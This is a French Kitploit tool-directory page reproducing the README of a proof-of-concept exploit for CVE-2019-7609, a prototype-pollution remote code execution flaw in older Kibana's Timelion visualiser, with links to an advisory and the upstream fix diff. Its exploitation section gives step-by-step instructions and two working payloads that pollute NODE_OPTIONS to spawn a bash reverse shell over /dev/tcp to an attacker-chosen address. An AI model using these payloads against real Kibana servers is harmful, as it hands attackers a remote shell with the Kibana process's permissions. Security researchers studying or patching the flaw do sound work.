Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2019-7609 — Exécution de code à distance sur les versions de Kibana antérieures à 5.6.15 et 6.6.0 dans le visualiseur Timelion. | Kitploit
Outils/GitHubGitHub/mpgn/cve-2019-7609
Génération de PayloadsAnalyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications Web
GitHubmpgn/cve-2019-7609

CVE-2019-7609

Exécution de code à distance sur les versions de Kibana antérieures à 5.6.15 et 6.6.0 dans le visualiseur Timelion.

Voir le dépôt
5612il y a 6 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2019-7609

Les versions de Kibana antérieures à 5.6.15 et 6.6.1 contiennent une faille d'exécution de code arbitraire dans le visualiseur Timelion. Un attaquant ayant accès à l'application Timelion pourrait envoyer une requête qui tentera d'exécuter du code JavaScript. Cela pourrait éventuellement permettre à un attaquant d'exécuter des commandes arbitraires avec les permissions du processus Kibana sur le système hôte.

Découvert par @securityMB

Note : j'ai testé cette attaque sur Kibana 6.6.0 mais elle ne fonctionnait pas... de mon côté, seules les versions de Kibana < 6.6.0 sont vulnérables, comme l'explique @securityMB

ÉDIT 20/12/2019 : si le panneau Canvas n'est pas accessible, consultez ce writeup de @Synacktiv https://www.synacktiv.com/posts/pentest/pwning-an-outdated-kibana-with-not-so-sad-vulnerabilities.html

kibana

Exploitation

  1. Ouvrez Kibana
  2. Collez l'un des payloads suivants dans le visualiseur Timelion
  3. Cliquez sur Run
  4. Dans le panneau de gauche, cliquez sur Canvas
  5. Votre reverse shell devrait apparaître ! :)
  • payload par @securityMB
root@kitploit:~
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.0.136/12345 0>&1");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
  • payload par @chybeta
root@kitploit:~
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i>& /dev/tcp/127.0.0.1/6666 0>&1\'");//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')

Analyse détaillée (anglais) :

  • https://slides.com/securitymb/prototype-pollution-in-kibana/#/

Avis de sécurité :

  • https://discuss.elastic.co/t/elastic-stack-6-6-1-and-5-6-15-security-update/169077

Correctif

https://github.com/elastic/kibana/commit/3377f813a5d96ff466bdf7343ce161de24830ed4.patch

root@kitploit:~
From 3377f813a5d96ff466bdf7343ce161de24830ed4 Mon Sep 17 00:00:00 2001
From: ppisljar <[email protected]>
Date: Wed, 16 Jan 2019 06:01:20 -0800
Subject: [PATCH] fixes

---
 .../core_plugins/timelion/server/series_functions/props.js      | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/legacy/core_plugins/timelion/server/series_functions/props.js b/src/legacy/core_plugins/timelion/server/series_functions/props.js
index 81b74901d4db..80e9cafd6712 100644
--- a/src/legacy/core_plugins/timelion/server/series_functions/props.js
+++ b/src/legacy/core_plugins/timelion/server/series_functions/props.js
@@ -32,7 +32,7 @@ function unflatten(data) {
     let prop = '';
     let m;
     while (m = regex.exec(p)) {
-      cur = cur[prop] || (cur[prop] = (m[2] ? [] : {}));
+      cur = (cur.hasOwnProperty(prop) && cur[prop]) || (cur[prop] = (m[2] ? [] : {}));
       prop = m[2] || m[1];
     }
     cur[prop] = data[p];
Télécharger l’outil